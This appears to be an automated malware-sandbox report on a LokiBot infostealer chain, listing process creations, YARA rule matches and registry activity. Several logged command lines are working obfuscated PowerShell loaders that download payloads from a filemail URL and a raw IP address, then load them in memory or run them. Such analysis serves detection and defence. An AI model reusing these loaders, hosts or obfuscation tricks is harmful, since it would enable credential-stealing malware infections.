                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNTJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))"Jump to behavior
                Source: 9.2.powershell.exe.660c250.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 9.2.powershell.exe.660c250.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 9.2.powershell.exe.660c250.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 9.2.powershell.exe.660c250.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: Process Memory Space: powershell.exe PID: 5948, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5536, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 5536, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: aspnet_compiler.exe PID: 3092, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0080A8C09_2_0080A8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0040549C11_2_0040549C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004029D411_2_004029D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00405B6F appears 42 times
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2018
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2406
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2018Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2406Jump to behavior
                Source: 9.2.powershell.exe.660c250.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 9.2.powershell.exe.660c250.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 9.2.powershell.exe.660c250.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 9.2.powershell.exe.660c250.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
